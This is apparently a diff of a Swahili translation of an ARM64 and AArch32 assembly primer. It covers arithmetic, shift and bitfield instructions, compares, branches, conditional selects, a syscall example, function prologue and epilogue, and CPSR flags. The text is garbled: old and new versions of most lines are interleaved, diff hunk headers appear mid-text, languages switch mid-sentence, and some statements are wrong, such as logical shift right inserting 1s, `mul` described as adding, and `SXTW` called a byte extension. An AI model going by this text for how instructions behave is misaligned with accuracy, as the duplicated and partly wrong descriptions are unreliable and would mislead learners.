- Mfano: `sub x0, x1, x2` — Hii inapunguza thamani katika `x2` kutoka `x1` na kuhifadhi matokeo katika `x0`.
- **`subs`** Hii ni kama sub lakini inasasisha bendera
- **`mul`**: **Weka** thamani za **register mbili** na uhifadhi matokeo katika register.
- Mfano: `mul x0, x1, x2` — Hii inaongeza thamani katika `x1` na `x2` na kuhifadhi matokeo katika `x0`.
- **`div`**: **Gawanya** thamani ya register moja kwa nyingine na uhifadhi matokeo katika register.
- Mfano: `div x0, x1, x2` — Hii inagawanya thamani katika `x1` kwa `x2` na kuhifadhi matokeo katika `x0`.
- Xn1 -> Destination
- Xn2 -> Operand 1
- Xn3 | #imm -> Operand 2 (rejista au immediate)
- \[shift #N | RRX] -> Fanya shift au tumia RRX
- Mfano: `add x0, x1, x2` — Hii inaongeza thamani za `x1` na `x2` pamoja na kuhifadhi matokeo katika `x0`.
- `add x5, x5, #1, lsl #12` — Hii ni sawa na 4096 (1 ikishiftwa mara 12) -> 1 0000 0000 0000 0000
- **`adds`** Hii hufanya `add` na kusasisha bendera
- **`sub`**: **Toa** thamani za virejista viwili na hifadhi matokeo katika rejista.
- Angalia **sintaksia ya `add`**.
- Mfano: `sub x0, x1, x2` — Hii inaondoa thamani ya `x2` kutoka `x1` na kuhifadhi matokeo katika `x0`.
- **`subs`** Hii ni kama sub lakini ikisasisha flag
- **`mul`**: **Zidisha** thamani za **virejista viwili** na hifadhi matokeo katika rejista.
- Mfano: `mul x0, x1, x2` — Hii inazidisha thamani za `x1` na `x2` na kuhifadhi matokeo katika `x0`.
- **`div`**: **Gawanya** thamani ya rejista moja kwa nyingine na hifadhi matokeo katika rejista.
- Mfano: `div x0, x1, x2` — Hii inagawa thamani ya `x1` kwa `x2` na kuhifadhi matokeo katika `x0`.
- **`lsl`**, **`lsr`**, **`asr`**, **`ror`, `rrx`**:
- **Shift ya Kihisia Kushoto**: Ongeza 0s kutoka mwisho ukihamisha bits nyingine mbele (ongeza kwa n-mara 2)
- **Shift ya Kihisia Kulia**: Ongeza 1s mwanzoni ukihamisha bits nyingine nyuma (gawanya kwa n-mara 2 katika isiyo ya saini)
- **Shift ya Kihisia Kulia**: Kama **`lsr`**, lakini badala ya kuongeza 0s ikiwa bit muhimu zaidi ni 1, **1s zinaongezwa** (gawanya kwa n-mara 2 katika saini)
- **Piga Kulia**: Kama **`lsr`** lakini chochote kinachondolewa kutoka kulia kinatolewa kushoto
- **Piga Kulia na Kuongeza**: Kama **`ror`**, lakini na bendera ya kubeba kama "bit muhimu zaidi". Hivyo bendera ya kubeba inahamishwa kwa bit 31 na bit iliyondolewa kwa bendera ya kubeba.
- **`bfm`**: **Hamisha Bit Filed**, operesheni hizi **nakala bits `0...n`** kutoka kwa thamani na kuziweka katika nafasi **`m..m+n`**. **`#s`** inaashiria **nafasi ya bit ya kushoto** na **`#r`** ni **kiasi cha kuhamasisha kulia**.
- Hamisha bitfiled: `BFM Xd, Xn, #r`
- Hamisha Bitfield ya Saini: `SBFM Xd, Xn, #r, #s`
- Hamisha Bitfield isiyo ya Saini: `UBFM Xd, Xn, #r, #s`
- **Hamisha na Ingiza Bitfield:** Nakala bitfield kutoka register moja na kuhamasisha kwenye register nyingine.
- **`BFI X1, X2, #3, #4`** Ingiza bits 4 kutoka X2 kutoka bit ya 3 ya X1
- **`BFXIL X1, X2, #3, #4`** Toa kutoka bit ya 3 ya X2 bits nne na kuhamasisha kwenye X1
- **`SBFIZ X1, X2, #3, #4`** Ongeza saini bits 4 kutoka X2 na kuhamasisha kwenye X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`SBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit 3 kutoka X2, inaongeza saini, na kuweka matokeo katika X1
- **`UBFIZ X1, X2, #3, #4`** Ongeza sifuri bits 4 kutoka X2 na kuhamasisha kwenye X1 kuanzia kwenye nafasi ya bit 3 ikizima bits za kulia
- **`UBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia bit 3 kutoka X2 na kuweka matokeo yaliyoongezwa sifuri katika X1.
- **Ongeza Saini kwa X:** Ongeza saini (au ongeza tu 0s katika toleo lisilo la saini) la thamani ili uweze kufanya operesheni nayo:
- **`SXTB X1, W2`** Ongeza saini ya byte **kutoka W2 hadi X1** (`W2` ni nusu ya `X2`) ili kujaza 64bits
- **`SXTH X1, W2`** Ongeza saini ya nambari ya 16bit **kutoka W2 hadi X1** ili kujaza 64bits
- **`SXTW X1, W2`** Ongeza saini ya byte **kutoka W2 hadi X1** ili kujaza 64bits
- **`UXTB X1, W2`** Ongeza 0s (isiyo ya saini) kwa byte **kutoka W2 hadi X1** ili kujaza 64bits
- **`extr`:** Inatoa bits kutoka **jozi maalum za register zilizounganishwa**.
- Mfano: `EXTR W3, W2, W1, #3` Hii itafanya **kuunganisha W1+W2** na kupata **kuanzia bit 3 ya W2 hadi bit 3 ya W1** na kuhifadhi katika W3.
- **`cmp`**: **Linganisha** register mbili na kuweka bendera za hali. Ni **alias ya `subs`** ikiseti register ya marudio kuwa register ya sifuri. Inafaida kujua ikiwa `m == n`.
- Inasaidia **sintaksia sawa na `subs`**
- Mfano: `cmp x0, x1` — Hii inalinganisha thamani katika `x0` na `x1` na kuweka bendera za hali ipasavyo.
- **`cmn`**: **Linganishi operand hasi**. Katika kesi hii ni **alias ya `adds`** na inasaidia sintaksia sawa. Inafaida kujua ikiwa `m == -n`.
- **`ccmp`**: Linganisha kwa masharti, ni kulinganisha ambayo itafanywa tu ikiwa kulinganisha kwa awali ilikuwa kweli na itaseti bits za nzcv kwa usahihi.
- `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> ikiwa x1 != x2 na x3 < x4, ruka kwa func
- Hii ni kwa sababu **`ccmp`** itatekelezwa tu ikiwa **`cmp` ya awali ilikuwa `NE`**, ikiwa haikuwa bits `nzcv` zitawekwa kuwa 0 (ambayo haitaridhisha kulinganisha `blt`).
- Hii pia inaweza kutumika kama `ccmn` (sawa lakini hasi, kama `cmp` dhidi ya `cmn`).
- **`tst`**: Inakagua ikiwa yoyote ya thamani za kulinganisha ni 1 (inafanya kazi kama ANDS bila kuhifadhi matokeo mahali popote). Inafaida kuangalia register na thamani na kuangalia ikiwa yoyote ya bits za register iliyoonyeshwa katika thamani ni 1.
- Mfano: `tst X1, #7` Angalia ikiwa yoyote ya bits tatu za mwisho za X1 ni 1
- **`teq`**: Operesheni ya XOR ikitenga matokeo
- **`b`**: Tawi lisilo na masharti
- **Logical shift left**: Ongeza 0s mwishoni ukisogeza biti nyingine mbele (kuzaa kwa n mara 2)
- **Logical shift right**: Ongeza 1s mwanzoni ukisogeza biti nyingine nyuma (gawanya kwa n mara 2 kwa unsigned)
- **Arithmetic shift right**: Kama **`lsr`**, lakini badala ya kuongeza 0s ikiwa bit ya juu zaidi ni 1, **1s zinaongezwa** (gawanya kwa n mara 2 kwa signed)
- **Rotate right**: Kama **`lsr`** lakini kile kinachokotolewa kutoka kulia kinarudishwa kushoto
- **Rotate Right with Extend**: Kama **`ror`**, lakini na bendera ya carry kama "most significant bit". Hivyo bendera ya carry inahamishwa hadi biti 31 na biti iliyotolewa kwenda bendera ya carry.
- **`bfm`**: **Bit Filed Move**, operesheni hizi **huhamisha bits `0...n`** kutoka thamani na kuziweka katika nafasi **`m..m+n`**. **`#s`** inaonyesha nafasi ya biti ya kushoto na **`#r`** ni kiasi cha rotate right.
- Bitfield move: `BFM Xd, Xn, #r`
- Signed Bitfield move: `SBFM Xd, Xn, #r, #s`
- Unsigned Bitfield move: `UBFM Xd, Xn, #r, #s`
- **Bitfield Extract and Insert:** Nakili bitfield kutoka rejista na kunakili kwa rejista nyingine.
- **`BFI X1, X2, #3, #4`** Ingiza bits 4 kutoka X2 kutoka biti ya 3 ya X1
- **`BFXIL X1, X2, #3, #4`** Toa kutoka biti ya 3 ya X2 bits nne na nakili kwenye X1
- **`SBFIZ X1, X2, #3, #4`** Inapanua kwa saini bits 4 kutoka X2 na kuingiza ndani ya X1 kuanzia bit nafasi 3 ikifuta bits za kulia
- **`SBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia biti 3 kutoka X2, inapanua kwa saini, na kuweka matokeo katika X1
- **`UBFIZ X1, X2, #3, #4`** Inapanua kwa sifuri bits 4 kutoka X2 na kuingiza ndani ya X1 kuanzia bit nafasi 3 ikifuta bits za kulia
- **`UBFX X1, X2, #3, #4`** Inatoa bits 4 kuanzia biti 3 kutoka X2 na kuweka matokeo yaliyo panuliwa kwa sifuri katika X1.
- **Sign Extend To X:** Inapanua saini (au kuongeza 0s katika toleo lisilo na saini) ya thamani ili kuwezesha operesheni nayo:
- **`SXTB X1, W2`** Inapanua saini ya byte **kutoka W2 hadi X1** (`W2` ni nusu ya `X2`) ili kuziba 64bits
- **`SXTH X1, W2`** Inapanua saini ya nambari ya 16bit **kutoka W2 hadi X1** ili kuziba 64bits
- **`SXTW X1, W2`** Inapanua saini ya byte **kutoka W2 hadi X1** ili kuziba 64bits
- **`UXTB X1, W2`** Inaongeza 0s (unsigned) kwa byte **kutoka W2 hadi X1** ili kuziba 64bits
- **`extr`:** Hutoa bits kutoka **jozi ya virejista zilizoshikiliwa mfululizo**.
- Mfano: `EXTR W3, W2, W1, #3` Hii itafanya **concat W1+W2** na kupata **kutoka biti 3 ya W2 hadi biti 3 ya W1** na kuihifadhi katika W3.
- **`cmp`**: **Linganisho** la virejista viwili na kuweka bendera za hali. Ni **alias ya `subs`** kuiweka rejista ya lengo kuwa zero register. Inafaa kujua ikiwa `m == n`.
- Inaunga mkono **sintaksia ile ile kama `subs`**
- Mfano: `cmp x0, x1` — Hii inalinganisha thamani za `x0` na `x1` na kuweka bendera za hali kwa mujibu.
- **`cmn`**: **Linganisho la negative** operand. Katika kesi hii ni **alias ya `adds`** na inaunga mkono sintaksia ile ile. Inafaa kujua ikiwa `m == -n`.
- **`ccmp`**: Linganisho la masharti, ni linganisho litakalofanywa tu kama linganisho la awali lilikuwa la kweli na hasa litasanidi bits nzcv.
- `cmp x1, x2; ccmp x3, x4, 0, NE; blt _func` -> ikiwa x1 != x2 na x3 < x4, ruka hadi func
- Hii ni kwa sababu **`ccmp`** itatekelezwa tu ikiwa **`cmp`** ya awali ilikuwa `NE`, kama sivyo bits `nzcv` zitasetwa kuwa 0 (ambayo haitaridhisha kulinganisha `blt`).
- Hii pia inaweza kutumika kama `ccmn` (sawa lakini negative, kama `cmp` dhidi ya `cmn`).
- **`tst`**: Inakagua ikiwa sehemu yoyote ya thamani za kulinganisha zote mbili ni 1 (inafanya kazi kama ANDS bila kuhifadhi matokeo mahali popote). Inafaa kukagua rejista dhidi ya thamani na kuona ikiwa moja ya bits za rejista zilizotajwa katika thamani ni 1.
- Mfano: `tst X1, #7` Angalia ikiwa yoyote ya bits 3 za mwisho za X1 ni 1
- **`teq`**: Operesheni ya XOR ikifuta matokeo
- **`b`**: Branch isiyokuwa na masharti
- Mfano: `b myFunction`
- Kumbuka kwamba hii haitajaza register ya kiungo na anwani ya kurudi (siyo sahihi kwa wito wa subrutine ambao unahitaji kurudi nyuma)
- **`bl`**: **Tawi** na kiungo, inatumika **kuita** **subroutine**. Hifadhi **anwani ya kurudi katika `x30`**.
- Mfano: `bl myFunction` — Hii inaita kazi `myFunction` na kuhifadhi anwani ya kurudi katika `x30`.
- Kumbuka kwamba hii haitajaza register ya kiungo na anwani ya kurudi (siyo sahihi kwa wito wa subrutine ambao unahitaji kurudi nyuma)
- **`blr`**: **Tawi** na Kiungo kwa Register, inatumika **kuita** **subroutine** ambapo lengo linatolewa katika **register**. Hifadhi anwani ya kurudi katika `x30`. (Hii ni
- Mfano: `blr x1` — Hii inaita kazi ambayo anwani yake inapatikana katika `x1` na kuhifadhi anwani ya kurudi katika `x30`.
- **`ret`**: **Rudi** kutoka **subroutine**, kwa kawaida ikitumia anwani katika **`x30`**.
- Mfano: `ret` — Hii inarudi kutoka kwa subroutine ya sasa ikitumia anwani ya kurudi katika `x30`.
- **`b.<cond>`**: Matawi ya masharti
- **`b.eq`**: **Tawi ikiwa sawa**, kulingana na amri ya awali ya `cmp`.
- Mfano: `b.eq label` — Ikiwa amri ya awali ya `cmp` iligundua thamani mbili sawa, hii inaruka kwa `label`.
- **`b.ne`**: **Tawi ikiwa Siyo Sawa**. Amri hii inakagua bendera za hali (ambazo ziliwekwa na amri ya kulinganisha ya awali), na ikiwa thamani zilizolinganishwa hazikuwa sawa, inatunga kwa lebo au anwani.
- Mfano: Baada ya amri ya `cmp x0, x1`, `b.ne label` — Ikiwa thamani katika `x0` na `x1` hazikuwa sawa, hii inaruka kwa `label`.
- **`cbz`**: **Linganishi na Tawi kwa Sifuri**. Amri hii inalinganisha register na sifuri, na ikiwa sawa, inatunga kwa lebo au anwani.
- Mfano: `cbz x0, label` — Ikiwa thamani katika `x0` ni sifuri, hii inaruka kwa `label`.
- **`cbnz`**: **Linganishi na Tawi kwa Siyo Sifuri**. Amri hii inalinganisha register na sifuri, na ikiwa hazikuwa sawa, inatunga kwa lebo au anwani.
- Mfano: `cbnz x0, label` — Ikiwa thamani katika `x0` si sifuri, hii inaruka kwa `label`.
- **`tbnz`**: Jaribu bit na tawi kwa siyo sifuri
- Kumbuka hili halitajaza link register na anwani ya kurudi (sio nzuri kwa wito za subrutine zinazohitaji kurudi)
- **`bl`**: **Branch** with link, inayotumika **kuita** **subroutine**. Inahifadhi **anwani ya kurudi katika `x30`**.
- Mfano: `bl myFunction` — Hii inaita function `myFunction` na kuhifadhi anwani ya kurudi katika `x30`.
- Kumbuka hili halitajaza link register na anwani ya kurudi (sio nzuri kwa wito za subrutine zinazohitaji kurudi)
- **`blr`**: **Branch** with Link to Register, inayotumika **kuita** **subroutine** ambapo lengo linatafsiriwa katika **rejista**. Inahifadhi anwani ya kurudi katika `x30`.
- Mfano: `blr x1` — Hii inaita function ambayo anwani yake iko ndani ya `x1` na kuhifadhi anwani ya kurudi katika `x30`.
- **`ret`**: **Rudia** kutoka **subroutine**, kawaida kwa kutumia anwani katika **`x30`**.
- Mfano: `ret` — Hii inarudisha kutoka subroutine ya sasa kwa kutumia anwani ya kurudi katika `x30`.
- **`b.<cond>`**: Branch za masharti
- **`b.eq`**: **Branch ikiwa sawa**, kwa msingi wa amri ya `cmp` ya awali.
- Mfano: `b.eq label` — Ikiwa amri ya `cmp` ya awali iligundua thamani mbili sawa, hii inaruka hadi `label`.
- **`b.ne`**: **Branch ikiwa si sawa**. Amri hii inakagua bendera za hali (zilizosetwa na amri ya kulinganisha ya awali), na ikiwa thamani zililinganishwa hazikuwa sawa, inaruka hadi label au anwani.
- Mfano: Baada ya amri `cmp x0, x1`, `b.ne label` — Ikiwa thamani katika `x0` na `x1` hazikuwa sawa, hii inaruka hadi `label`.
- **`cbz`**: **Compare and Branch on Zero**. Amri hii inalinganisha rejista na sifuri, na ikiwa ni sawa, inaruka hadi label au anwani.
- Mfano: `cbz x0, label` — Ikiwa thamani katika `x0` ni sifuri, hii inaruka hadi `label`.
- **`cbnz`**: **Compare and Branch on Non-Zero**. Amri hii inalinganisha rejista na sifuri, na ikiwa si sawa, inaruka hadi label au anwani.
- Mfano: `cbnz x0, label` — Ikiwa thamani katika `x0` si sifuri, hii inaruka hadi `label`.
- **`tbnz`**: Test bit and branch on nonzero
- Mfano: `tbnz x0, #8, label`
- **`tbz`**: Jaribu bit na tawi kwa sifuri
- **`tbz`**: Test bit and branch on zero
- Mfano: `tbz x0, #8, label`
- **Operesheni za kuchagua kwa masharti**: Hizi ni operesheni ambazo tabia yake inabadilika kulingana na bits za masharti.
- **Conditional select operations**: Hizi ni operesheni ambazo tabia zao zinatofautiana kulingana na bits za conditional.
- `csel Xd, Xn, Xm, cond` -> `csel X0, X1, X2, EQ` -> Ikiwa kweli, X0 = X1, ikiwa si kweli, X0 = X2
- `csinc Xd, Xn, Xm, cond` -> Ikiwa kweli, Xd = Xn, ikiwa si kweli, Xd = Xm + 1
- `cinc Xd, Xn, cond` -> Ikiwa kweli, Xd = Xn + 1, ikiwa si kweli, Xd = Xn
@ -208,50 +211,50 @@ Amri za ARM64 kwa ujumla zina **muundo `opcode dst, src1, src2`**, ambapo **`opc
- `cneg Xd, Xn, cond` -> Ikiwa kweli, Xd = - Xn, ikiwa si kweli, Xd = Xn
- `cset Xd, Xn, Xm, cond` -> Ikiwa kweli, Xd = 1, ikiwa si kweli, Xd = 0
- `csetm Xd, Xn, Xm, cond` -> Ikiwa kweli, Xd = \<all 1>, ikiwa si kweli, Xd = 0
- **`adrp`**: Hesabu **anwani ya ukurasa ya alama** na uhifadhi katika register.
- Mfano: `adrp x0, symbol` — Hii inahesabu anwani ya ukurasa ya `symbol` na kuihifadhi katika `x0`.
- **`ldrsw`**: **Pakia** thamani ya saini **ya 32-bit** kutoka kumbukumbu na **ongeza saini hadi 64** bits.
- Mfano: `ldrsw x0, [x1]` — Hii inapakua thamani ya saini ya 32-bit kutoka eneo la kumbukumbu lililoonyeshwa na `x1`, inaongeza saini hadi 64 bits, na kuihifadhi katika `x0`.
- **`stur`**: **Hifadhi thamani ya register kwenye eneo la kumbukumbu**, kwa kutumia offset kutoka register nyingine.
- Mfano: `stur x0, [x1, #4]` — Hii inahifadhi thamani katika `x0` kwenye anwani ya kumbukumbu ambayo ni bytes 4 zaidi kuliko anwani iliyopo katika `x1`.
- **`svc`** : Fanya **wito wa mfumo**. Inasimama kwa "Wito wa Msimamizi". Wakati processor inatekeleza amri hii, inabadilisha kutoka hali ya mtumiaji hadi hali ya kernel na kuruka kwenye eneo maalum la kumbukumbu ambapo **kanuni ya kushughulikia wito wa mfumo wa kernel** inapatikana.
- **`adrp`**: Hesabu anwani ya ukurasa ya alama na kuihifadhi katika rejista.
- Mfano: `adrp x0, symbol` — Hii inahesabu anwani ya ukurasa wa `symbol` na kuihifadhi katika `x0`.
- **`ldrsw`**: **Pakia** thamani ya musema wa **32-bit** kutoka kumbukumbu na **upanua kwa saini hadi 64** bits.
- Mfano: `ldrsw x0, [x1]` — Hii inapakia thamani ya musema ya 32-bit kutoka eneo la kumbukumbu linaloashiriwa na `x1`, inapanua kwa saini hadi 64 bits, na kuihifadhi katika `x0`.
- **`stur`**: **Hifadhi thamani ya rejista kwa eneo la kumbukumbu**, ukitumia offset kutoka rejista nyingine.
- Mfano: `stur x0, [x1, #4]` — Hii inahifadhi thamani ya `x0` katika anwani ya kumbukumbu ambayo ni byte 4 mbele ya anwani iliyopo sasa katika `x1`.
- **`svc`** : Fanya **system call**. Inasimama kwa "Supervisor Call". Wakati processor inatekeleza amri hii, inabadilisha kutoka user mode hadi kernel mode na kuruka hadi eneo maalum la kumbukumbu ambapo msimbo wa kernel wa kushughulikia system call uko.
- Mfano:
```armasm
mov x8, 93 ; Pakia nambari ya wito wa mfumo kwa kutoka (93) ndani ya register x8.
mov x0, 0 ; Pakia msimamo wa kutoka (0) ndani ya register x0.
svc 0 ; Fanya wito wa mfumo.
mov x8, 93 ; Load the system call number for exit (93) into register x8.
mov x0, 0 ; Load the exit status code (0) into register x0.
svc 0 ; Make the system call.
```
### **Prologue ya Kazi**
### **Function Prologue**
1. **Hifadhi register ya kiungo na pointer ya frame kwenye stack**:
1. **Hifadhi link register na frame pointer kwenye stack**:
```armasm
stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer
```
2. **Weka kiashiria kipya cha fremu**: `mov x29, sp` (weka kiashiria kipya cha fremu kwa kazi ya sasa)
3. **Panga nafasi kwenye stack kwa ajili ya mabadiliko ya ndani** (ikiwa inahitajika): `sub sp, sp, <size>` (ambapo `<size>` ni idadi ya bytes zinazohitajika)
2. **Sanidi kiashiria kipya cha fremu**: `mov x29, sp` (huweka kiashiria kipya cha fremu kwa kazi ya sasa)
3. **Tenga nafasi kwenye stack kwa vigezo vya ndani** (ikiwa inahitajika): `sub sp, sp, <size>` (ambapo `<size>` ni idadi ya bytes zinazohitajika)
### **Epilogue ya Kazi**
### **Hitimisho la Kazi**
1. **Futa mabadiliko ya ndani (ikiwa yoyote yalikuwa yamepangwa)**: `add sp, sp, <size>`
2. **Rejesha kiashiria cha kiungo na kiashiria cha fremu**:
1. **Rejesha nafasi ya vigezo vya ndani (ikiwa zilikuwa zimepangwa)**: `add sp, sp, <size>`
2. **Rejesha rejista ya link na kiashiria cha fremu**:
```armasm
ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer
```
3. **Return**: `ret` (inarudisha udhibiti kwa mwito kwa kutumia anwani katika register ya kiungo)
3. **Rudisha**: `ret` (inarudisha udhibiti kwa caller kwa kutumia anwani katika link register)
## AARCH32 Hali ya Utendaji
## AARCH32 Execution State
Armv8-A inasaidia utendaji wa programu za bit 32. **AArch32** inaweza kukimbia katika moja ya **seti mbili za maagizo**: **`A32`** na **`T32`** na inaweza kubadilisha kati yao kupitia **`interworking`**.\
**Programu za 64-bit** zenye mamlaka zinaweza kupanga **utendaji wa programu za 32-bit** kwa kutekeleza uhamisho wa kiwango cha kipekee kwa 32-bit yenye mamlaka ya chini.\
Kumbuka kwamba mpito kutoka 64-bit hadi 32-bit unafanyika kwa kupunguza kiwango cha kipekee (kwa mfano, programu ya 64-bit katika EL1 ikichochea programu katika EL0). Hii inafanywa kwa kuweka **bit 4 ya** **`SPSR_ELx`** register maalum **kuwa 1** wakati mchakato wa `AArch32` uko tayari kutekelezwa na sehemu nyingine ya `SPSR_ELx` inahifadhi **CPSR** za programu za **`AArch32`**. Kisha, mchakato wenye mamlaka unaita maagizo ya **`ERET`** ili processor ipitie **`AArch32`** ikingia katika A32 au T32 kulingana na CPSR**.**
Armv8-A inaunga mkono utekelezaji wa programu za 32-bit. **AArch32** inaweza kuendesha katika mojawapo ya **seti mbili za maagizo**: **`A32`** na **`T32`** na inaweza kubadilisha kati yao kupitia **`interworking`**.\
**Privileged** 64-bit programs can schedule the **execution of 32-bit** programs by executing a exception level transfer to the lower privileged 32-bit.\
Kumbuka kuwa mabadiliko kutoka 64-bit hadi 32-bit hufanyika kwa exception level ya chini (kwa mfano programu ya 64-bit katika EL1 ikichochea programu katika EL0). Hii hufanywa kwa kuweka **bit 4 of** **`SPSR_ELx`** register maalum **kwa 1** wakati thread ya mchakato wa `AArch32` iko tayari kutekelezwa na sehemu nyingine ya `SPSR_ELx` inahifadhi CPSR ya programu za **`AArch32`**. Kisha, mchakato mwenye ruhusa anaita instruction ya **`ERET`** ili processor ibadilike kuwa **`AArch32`** ikingia katika A32 au T32 kulingana na CPSR**.**
**`interworking`** inafanyika kwa kutumia bit J na T za CPSR. `J=0` na `T=0` inamaanisha **`A32`** na `J=0` na `T=1` inamaanisha **T32**. Hii kimsingi inamaanisha kuweka **bit ya chini kabisa kuwa 1** kuashiria kwamba seti ya maagizo ni T32.\
Hii imewekwa wakati wa **maagizo ya tawi la interworking,** lakini inaweza pia kuwekwa moja kwa moja na maagizo mengine wakati PC imewekwa kama register ya marudio. Mfano:
The **`interworking`** occurs using the J and T bits of CPSR. `J=0` and `T=0` means **`A32`** and `J=0` and `T=1` means **T32**. Hii kwa kawaida inamaanisha kuweka bit ya chini kuwa 1 kuashiria kuwa seti ya maagizo ni T32.\
Hii imewekwa wakati wa **interworking branch instructions,** lakini pia inaweza kuwekwa moja kwa moja kwa maagizo mengine wakati PC imewekwa kama rejista ya destination. Mfano:
Mfano mwingine:
Another example:
```armasm
_start:
.code 32 ; Begin using A32
@ -262,62 +265,62 @@ bx r4 ; Swap to T32 mode: Jump to "mov r0, #0" + 1 (so T32)
mov r0, #0
mov r0, #8
```
### Registers
### Rejista
Kuna register 16 za 32-bit (r0-r15). **Kuanzia r0 hadi r14** zinaweza kutumika kwa **operesheni yoyote**, hata hivyo baadhi yao mara nyingi huhifadhiwa:
Kuna rejista 16 za 32-bit (r0-r15). **Kutoka r0 hadi r14** zinaweza kutumika kwa **operesheni yoyote**, ingawa baadhi yao kawaida huhifadhiwa:
- **`r15`**: Program counter (daima). Inashikilia anwani ya amri inayofuata. Katika A32 sasa + 8, katika T32, sasa + 4.
- **`r15`**: Program counter (daima). Inashikilia anuani ya maelekezo yanayofuata. In A32 current + 8, in T32, current + 4.
- **`r11`**: Frame Pointer
- **`r12`**: Intra-procedural call register
- **`r13`**: Stack Pointer
- **`r13`**: Stack Pointer (Kumbuka stack daima imepangiliwa kwa 16-byte)
- **`r14`**: Link Register
Zaidi ya hayo, register zinaungwa mkono katika **`banked registries`**. Ambazo ni maeneo yanayohifadhi thamani za register kuruhusu kufanya **fast context switching** katika usimamizi wa makosa na operesheni za kibali ili kuepuka hitaji la kuhifadhi na kurejesha register kwa mikono kila wakati.\
Hii inafanywa kwa **kuhifadhi hali ya processor kutoka `CPSR` hadi `SPSR`** ya hali ya processor ambayo makosa yanachukuliwa. Wakati makosa yanarejea, **`CPSR`** inarejeshwa kutoka **`SPSR`**.
Zaidi ya hayo, rejista zinaungwa mkono katika **`banked registries`**. Hizo ni sehemu zinazohifadhi thamani za rejista kuruhusu **fast context switching** katika kushughulikia exceptions na operesheni zilizo na ruhusa za juu ili kuepuka haja ya kuhifadhi na kurejesha rejista kila wakati kwa mkono.\
Hii hufanyika kwa **kuhifadhi hali ya processor kutoka `CPSR` hadi `SPSR`** ya mode ya processor ambapo exception inachukuliwa. Ukitokeza exception, **`CPSR`** inarejeshwa kutoka **`SPSR`**.
### CPSR - Current Program Status Register
Katika AArch32 CPSR inafanya kazi kama **`PSTATE`** katika AArch64 na pia inahifadhiwa katika **`SPSR_ELx`** wakati makosa yanachukuliwa ili kurejesha utekelezaji baadaye:
In AArch32 CPSR inafanya kazi kama **`PSTATE`** katika AArch64 na pia inahifadhiwa katika **`SPSR_ELx`** wakati exception inachukuliwa ili kurejeshwa baadaye ya utekelezaji:
<figure><img src="../../../images/image (1197).png" alt=""><figcaption></figcaption></figure>
Sehemu zimegawanywa katika makundi kadhaa:
- Application Program Status Register (APSR): Bendera za hesabu na zinazoweza kufikiwa kutoka EL0
- Application Program Status Register (APSR): vifungo vya kihesabu na vinavyopatikana kutoka EL0
- Execution State Registers: Tabia ya mchakato (inasimamiwa na OS).
#### Application Program Status Register (APSR)
- Bendera **`N`**, **`Z`**, **`C`**, **`V`** (kama ilivyo katika AArch64)
- Bendera **`Q`**: Inapangwa kuwa 1 kila wakati **saturation ya integer inapotokea** wakati wa utekelezaji wa amri maalum ya hesabu ya saturation. Mara inapowekwa kuwa **`1`**, itahifadhi thamani hiyo hadi iwekwe kwa mikono kuwa 0. Zaidi ya hayo, hakuna amri inayokagua thamani yake kwa njia isiyo ya moja kwa moja, inapaswa kufanywa kwa kusoma kwa mikono.
- Bendera **`GE`** (Kubwa kuliko au sawa): Inatumika katika operesheni za SIMD (Single Instruction, Multiple Data), kama vile "kuongeza kwa pamoja" na "kupunguza kwa pamoja". Operesheni hizi zinaruhusu kusindika vidokezo vingi vya data katika amri moja.
- Vifungo vya **`N`**, **`Z`**, **`C`**, **`V`** (kama ilivyo katika AArch64)
- Kifungo cha **`Q`**: Kinawekwa kuwa 1 kila wakati **saturation ya integer** inapotokea wakati wa kutekeleza maelekezo maalumu ya arithmetic inayosaturate. Mara kinawekwa kuwa **`1`**, kitaendelea kuwa na thamani hiyo hadi kiwe kimewekwa kwa 0 kwa mkono. Zaidi ya hayo, hakuna maelekezo yanayochunguza thamani yake kwa njia isiyo ya moja kwa moja; lazima isomwe kwa mkono.
- Vifungo vya **`GE`** (Greater than or equal): Vinatumika katika operesheni za SIMD (Single Instruction, Multiple Data), kama "parallel add" na "parallel subtract". Operesheni hizi zinaruhusu kusindika pointi nyingi za data kwa maelekezo moja.
Kwa mfano, amri **`UADD8`** **inaongeza jozi nne za bytes** (kutoka kwa operandi mbili za 32-bit) kwa pamoja na kuhifadhi matokeo katika register ya 32-bit. Kisha **inaweka bendera za `GE` katika `APSR`** kulingana na matokeo haya. Kila bendera ya GE inahusiana na moja ya nyongeza za byte, ikionyesha ikiwa nyongeza ya jozi hiyo ya byte **ilivuka**.
Kwa mfano, maelekezo **`UADD8`** **huongeza jozi nne za bytes** (kutoka kwa operands mbili za 32-bit) kwa mpangilio na kuhifadhi matokeo katika rejista ya 32-bit. Kisha **huweka vifungo vya `GE` katika `APSR`** kulingana na matokeo haya. Kila kifungo cha GE kinahusiana na moja ya ziada za byte, kikionyesha kama kuongeza kwa jozi hiyo ya byte **iliuza**.
Amri **`SEL`** inatumia bendera hizi za GE kufanya vitendo vya masharti.
Maelekezo ya **`SEL`** hutumia vifungo hivyo vya GE kufanya vitendo kwa masharti.
#### Execution State Registers
- Bits **`J`** na **`T`**: **`J`** inapaswa kuwa 0 na ikiwa **`T`** ni 0 seti ya amri A32 inatumika, na ikiwa ni 1, T32 inatumika.
- **IT Block State Register** (`ITSTATE`): Hizi ni bits kutoka 10-15 na 25-26. Zinahifadhi hali za masharti kwa amri ndani ya kundi lililo na prefiksi **`IT`**.
- Bit **`E`**: Inaonyesha **endianness**.
- **Mode and Exception Mask Bits** (0-4): Zinabainisha hali ya sasa ya utekelezaji. **Ya 5** inaonyesha ikiwa programu inafanya kazi kama 32bit (1) au 64bit (0). Nyingine 4 zinaonyesha **hali ya makosa inayotumika sasa** (wakati makosa yanatokea na yanashughulikiwa). Nambari iliyowekwa **inaonyesha kipaumbele cha sasa** ikiwa makosa mengine yanachochewa wakati huu unashughulikiwa.
- Bit za **`J`** na **`T`**: **`J`** inapaswa kuwa 0 na ikiwa **`T`** ni 0 seti ya maelekezo A32 inatumiwa, na ikiwa ni 1, T32 inatumiwa.
- IT Block State Register (`ITSTATE`): Hizi ni bits kutoka 10-15 na 25-26. Zinahifadhi masharti kwa maelekezo ndani ya kundi lililo na nyongeza ya **`IT`**.
